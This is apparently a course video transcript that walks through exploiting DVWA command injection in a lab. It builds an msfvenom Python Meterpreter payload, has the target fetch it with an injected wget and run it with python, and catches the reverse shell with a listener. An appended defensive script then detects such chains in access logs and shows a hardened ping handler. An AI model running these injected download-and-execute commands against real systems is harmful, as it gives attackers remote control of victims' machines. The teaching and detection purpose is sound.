[00:00:00] Okay. So we have covered command injection, but you can combine this vulnerability with other tools as well. For example, in the last video we managed to establish a connection using netcat and the command injection vulnerability. But we can improve this by injecting a different payload, such as a Meterpreter shell or a reverse shell that we coded in Python. The process of doing that is the same, so I'll show you how to send a payload to the target and make it execute with command injection.

[00:00:34] Why would we want to do this? Well, we always want to have the best payload possible. So why would we use netcat when Meterpreter gives us a lot more useful options to run on the target system?

[00:00:47] And to do all of that, here are the steps that we must perform. We must first create the payload appropriate for our target. Then we must download that payload to our target machine with the help of the command injection vulnerability. And at last we must execute that payload, also with the help of the command injection vulnerability. So sounds pretty simple, right?

[00:01:11] Let's figure out what payload we should create first. So to create a payload, we need to figure out what we know about our target. Well, we know that Metasploitable is a Linux 32-bit machine. So we can create a Linux Meterpreter payload.
[00:01:28] But for this case, I like the Python payload a lot better. So let's create a Python Meterpreter shell. The great thing about Linux systems is that they come with Python by default. So a Python payload is something that we can execute on our target without them having to install any additional software.

[00:01:47] Let's create it real quick. So we'll navigate to my Desktop directory and here I will type msfvenom -p, and that will specify that we want to create python/meterpreter/reverse_tcp. The LHOST is going to be our IP address. So let's check it out real quick. It is 192.168.1.9. Copied and pasted right here. For the port, we can use port 6000, for example, and we are going to redirect the output with the arrow into tester.py. I just named the payload tester, but feel free to name it anything that you want. I will press enter here and this will create our Python payload.

[00:02:40] Let me go right here over this. And while this is creating, make sure that your Burp Suite is started up. Also make sure that your intercept is turned off and start up your Firefox and your Metasploitable virtual machine. So once you do that, here in just a few seconds our payload should be done. And here it is.
[00:03:04] Now that we got the payload created, we must figure out how we can deliver it to the target system. Of course we will do that using the command injection, but even then, the target must be able to download our payload from somewhere. Right. For this, we're going to use the Apache 2 web server and host our payload there.

[00:03:24] Apache comes with Linux already, so we can make it run real quick. To do that we must first type sudo and then service apache2 start. It will ask us for the password. We input the password and this will start our Apache 2 web server. What does this mean? Well, this means that any file that is hosted inside of the /var/www/html directory on our Kali Linux will be hosted on our web page to anyone that visits our IP address.

[00:03:56] Let's first of all visit that directory. So if I cd to /var/www/html and type ls here, we got shell.txt from some previous video, which we can delete straight away. And this might require root privileges. So let us just enter the root account with sudo su and let's delete the shell.txt. And now our directory is empty, so no files are being hosted on our web server. Let's copy our tester, which in my case is in my home directory, Mr. Hacker, under Desktop, tester.py. And we want to copy it inside /var/www/html.
[00:04:39] And now if we were to go to our Kali Linux machine and visit the IP address of my Kali Linux, which is 192.168.1.9, we are going to see this page that has this file available to download. Great. All we are left to do right now is to execute this file on the target system.

[00:05:00] Let's go to our command injection page on our Metasploitable. And to do that, we visit the IP address of Metasploitable and navigate to DVWA. All of this we already know. Let us enter the username and password and go to the command injection. But before we do that, change the security level to either low or medium.

[00:05:22] Once we do that, inside of the command injection we can execute the commands as in the previous video. So if I type right here 192.168.1.1 and a semicolon, and then ls after it, it will ping the router's IP address and it will also print out the contents of that directory. But we don't want to ping every time. We can just type a semicolon, which will specify that we want to enter the next command, and we can just type ls after it. And this will just give us the output of the ls command and we won't have to wait for the ping command to finish.

[00:05:58] Now let's download our payload using the wget command, and wget is something that you can run from a terminal in order to download a specific file from the page or link that you specify.
[00:06:10] Let me show you inside of the terminal first. So right now I'm inside of the /home directory of Mr. Hacker and I don't have tester.py right here, but if I run the command wget and then 192.168.1.9, which is the IP address of Kali Linux, slash, and then tester.py. With this link, we are accessing this page right here and this file right here, which will tell our terminal that we want to download that file. If I press enter, it will download tester.py, and if I type ls once again, now we have tester.py inside of our home directory of Mr. Hacker.

[00:06:52] We want to do the same thing on our target machine. So to do that, we can use a semicolon to specify the next command and type the same command: wget 192.168.1.9/tester.py. I press submit. And if I run the ls command once again, now we have one additional file, which is our payload. So it is there. It is on the target machine right now with the help of command injection.

[00:07:25] The last step we have to do is to set up a listener inside of msfconsole. So let's do that real quick. And after we set up a listener, we must execute our payload. And here is msfconsole; we are already familiar with setting up the listener.
[00:07:42] We are going to use exploit/multi/handler and we need to set the payload to be python/meterpreter/reverse_tcp. If I show options, all we want to do is set the LHOST and LPORT, and that will be the IP address of Kali Linux and the port will be 6000. The same options that we specified inside msfvenom. Then I will run this, and all we are left to do right now is to execute this tester.py with the help of command injection. So let's see how we can do that.

[00:08:20] If I type a semicolon and python tester.py and press enter, this page will load. And this is good news, because that would most likely mean that we got the Meterpreter shell opened with the help of Python. We executed our Python program on the target machine and it opened our Meterpreter shell, where we can execute various commands as usual. We can run the help command to see what else we can execute, and we can basically perform the post exploitation that we already covered.

[00:08:54] Great. So this is just another way that you can use command injection to your advantage to spawn a better payload than just a simple netcat command execution. So you can try to test this with our Python payload if you want. Great.
[00:09:09] Now that we have covered the command injection vulnerability, in the next video we're going to go into the cross-site scripting vulnerability. See you there.
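The chain shown in the video (a semicolon appended to the ping form's value, then wget to fetch the stager, then python to run it) leaves a clear trail in the web server's access log, and the ping handler itself is only exploitable because the value reaches a shell unvalidated. The following is an added example from the defender's side, not code from the video or from DVWA: it parses a handful of constructed Apache access-log lines, flags request parameters that carry shell separators or download-and-execute tooling, and shows a hardened ping handler that validates the address and never invokes a shell. The log lines, the 10.0.0.x client addresses and the safe_ping function are all hypothetical.

```python
"""Spot command-injection chains in web access logs and show the hardened handler.

Added example, not part of the original video. The log lines below are constructed
(hypothetical) and modelled on the DVWA command-injection page: a form whose 'ip'
parameter ends up in a shell command, so ';ls', ';wget ...' and ';python ...' ride
along with the expected address.
"""
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in Apache combined log format (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:12:00:01 +0000] "GET /dvwa/vulnerabilities/exec/?ip=192.168.1.1&Submit=Submit HTTP/1.1" 200 1537 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Oct/2023:12:00:09 +0000] "GET /dvwa/vulnerabilities/exec/?ip=%3Bls&Submit=Submit HTTP/1.1" 200 1602 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Oct/2023:12:00:20 +0000] "GET /dvwa/vulnerabilities/exec/?ip=%3Bwget+192.168.1.9%2Ftester.py&Submit=Submit HTTP/1.1" 200 1540 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Oct/2023:12:00:31 +0000] "GET /dvwa/vulnerabilities/exec/?ip=%3Bpython+tester.py&Submit=Submit HTTP/1.1" 200 1540 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Oct/2023:12:01:00 +0000] "GET /dvwa/index.php HTTP/1.1" 200 4210 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Shell metacharacters that let a second command ride along with the expected value.
SEPARATORS = re.compile(r"[;&|`$]|\$\(")
# Tools typically seen in the download-then-execute stage described in the video.
STAGE_TOOLS = re.compile(r"\b(wget|curl|python\d?|perl|nc|bash|sh)\b")


def parse_line(line):
    """Return (src, ts, status, {param: value}) for one access-log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = urlsplit(m.group("target")).query
    # parse_qs splits on '&' first, then percent-decodes, so an encoded ';' is recovered.
    params = {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}
    return m.group("src"), m.group("ts"), int(m.group("status")), params


def classify(value):
    """Label one parameter value: 'clean', 'separator', or 'download_or_exec'."""
    if not SEPARATORS.search(value):
        return "clean"
    if STAGE_TOOLS.search(value):
        return "download_or_exec"
    return "separator"


def scan_log(text):
    """Return one finding per request parameter that carries a command separator."""
    findings = []
    for line in text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        src, ts, status, params = parsed
        for name, value in params.items():
            label = classify(value)
            if label != "clean":
                findings.append({"src": src, "ts": ts, "param": name,
                                 "value": value, "label": label})
    return findings


def safe_ping(ip_text):
    """Hardened form of the vulnerable ping handler (hypothetical, not DVWA's code).

    Validates the value as an IP address and returns the argv list that should be
    handed to subprocess.run(...) without shell=True; raises ValueError otherwise,
    so ';ls' or ';wget ...' never reaches a command line at all.
    """
    addr = ipaddress.ip_address(ip_text.strip())
    return ["ping", "-c", "3", str(addr)]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['src']} {f['label']:17} {f['param']}={f['value']!r}")
```

Run stand-alone, the script prints three findings, all from the same client within half a minute: a bare separator probe, then a download, then an execution. Correlating those three labels in sequence from one source, rather than alerting on any single semicolon, is what separates this chain from noise in a real log.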